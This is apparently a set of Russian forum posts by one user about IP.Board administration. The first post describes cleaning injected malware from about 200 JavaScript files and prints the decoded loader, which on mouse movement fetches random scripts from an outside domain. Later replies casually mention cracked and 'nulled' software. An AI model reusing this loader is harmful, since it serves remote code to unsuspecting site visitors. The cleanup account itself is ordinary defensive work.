Respected

Итак, недавно наш форум столкнулся с фреймом, который антивирусы посчитали за вирусную ссылку. Так как это мой первый опыт с вирусом на сайте/форуме, то я его обнаружил не так быстро, как мне хотелось.. Поделюс опытом удаления 'плохого' скрипта с форума. Как работал фрейм? Очень просто, при загрузке страницы, подгружающей заражённый яваскрипт, он активировался при малейшем движении курсором мышки и подгружал яваскрипт с какого-то постороннего сайта, в моём случае это был ___constructivehell.is-a-cubicle-slave.com/g/1351559130384.js, что делает этот срипт - не известно. Названиние подгружаемого скрипта генерировалось автоматически. Первое, что пришло мне на ум - сделать резервную копию форума и слить её на компьютер, а там уже разными прогами искать вирус по тексту в файлах.... Что я и сделал. Скачав копию форума, я начал искать название ссылки, которую блокировал антивирус, во всей копии с помощью программы Folder Find Text, но все мои попытки были напрасными.. Ссылка не находилась. Тогда я обратился хостеру, который подсказал мне где может находиться вирус и как его обнаружить (золотой же человек мой хостер ) То, что вирусный код содержится в яваскриптах, он сказал однозначно и уверенно. Как же мне найти этот код? Было предложено отсортировать файлы по дате изменения и уже смотреть их.. Но я пошёл другим путём, поискал в интрнете подобный случай и обнаружил, что это код кодируется в скриптах. Там же я обнаружил как именно он кодируется, и, по небольшому кусочку кода, начал поиск по резервной копии.. Результаты поиска меня просто шокировали: около 200 яваскриптов было заражено этим кодом. Вот как он выглядит в зашифрованном виде: А вот как в расшифрованном виде: (function() { var url = '__constructivehell.is-a-cubicle-slave.com/g/'; if (typeof window.xyzflag === 'undefined') { window.xyzflag = 0; } document.onmousemove = function() { if (window.xyzflag === 0) { window.xyzflag = 1; var head = document.getElementsByTagName('head')[0]; var script = document.createElement('script'); script.type = 'text/javascript'; script.onreadystatechange = function() { if (this.readyState == 'complete') { window.xyzflag = 2; } }; script.onload = function() { window.xyzflag = 2; }; script.src = url + Math.random().toString().substring(3) + '.js'; head.appendChild(script); } }; })(); [/code] [/spoiler] Пришлось очищать каждый скрипт от этого кода. У меня сразу же возникло пару вопросов: Как он мог проникнуть в скрипты на сервере? Кто его туда записал? По моему [u]не профессиональному[/u] мнению, я могу лишь предположить, что у меня просто угнали данные для доступа к FTP, что можно проверить по логам, было ли там копирование, а затем замена практически всех яваскриптов на форуме...

Установи чат, зайди на форум и посмотри лог файл из папки cache.

7.03 - новая версия с новыми возможностями. Пользоваться ей будет не так уж просто... замудрённый метод обхода лицензии. на рутрекере есть :D

Конечно стоит)

В инете есть уже Allsubmitter v7.03 крякнутая рабочая..

В русскоязычной не работает из за не профессионального нулла, можно исправить конечно, но это займёт много времени у меня, не хочу этим заниматься..

В англоязычном нулле визуальный редактор работает!

Есть, но он скорее всего отключён! Точно не знаю!

Пользовался давненько этой программой, прога супер. Максимальный эффект регистрации форума/сайта можно получить лишь купив лицензию + парочка платных баз! Ломаная прога и старые базы, что можно найти на просторах инета дают очень маленький выхлоп. ИМХО Почему? что пишет?

Потому что это не ссылка! Это загруженное на сервер изображение! Нет, это не глюк! В настройках данного форума нужно разрешить гостям загрузку файлов!

На скриншоте показано загруженное изображение, его он не будет скрывать, т.к. это не ссылка!

Ссылочку на форум в ЛС пожалуйста!

Тут может быть несколько причин, одной из которых является не правильный путь до папки uploads в админке, либо нет прав на запись. Что нужно сделать? 1. Проверить путь к папке uploads: Глобальные настройки --> Пути и адреса форума 2. Проверить права на папку. FTP-клиент, либо админпанель хоста; 3. Прописать инструкции в .htaccess (см выше) 4. Если не помогает - сменить загрузчик с флеш на обычный) ------------------------------------------------------ Пока писал сообщение - всё нормализовалось

Есть платный хук (M32) Auto Birthday Greeter 1.2.0

В форме быстрого ответа вроде нельзя файлы прикреплять)

в .htaccess добавь: php_value upload_max_filesize 25M php_value max_execution_time 800 php_value post_max_size 20M [/CODE]

Стиль какой?

Если кто и возьмётся - будет не дёшего стоить..

Комментирование не вернуть, если не попросить разработчиков опять прикрутить))

Название: (SOS33) Birthday in Registration Screen 1.0.1 Добавил: Respected Добавлен: 27 Feb 2012 Категория: Хуки IP.Board 3.3.x Хук позволит новым пользователям при регистрации установить дату своего рождения!

Да, конечно!

Как же нет! Не просто же так другой версией назвали, какие-то исправления присутствуют..

Станно всё ккак-то.. Форум версии 3.2.3 ?

Эту настройку проверил? Стиль какой?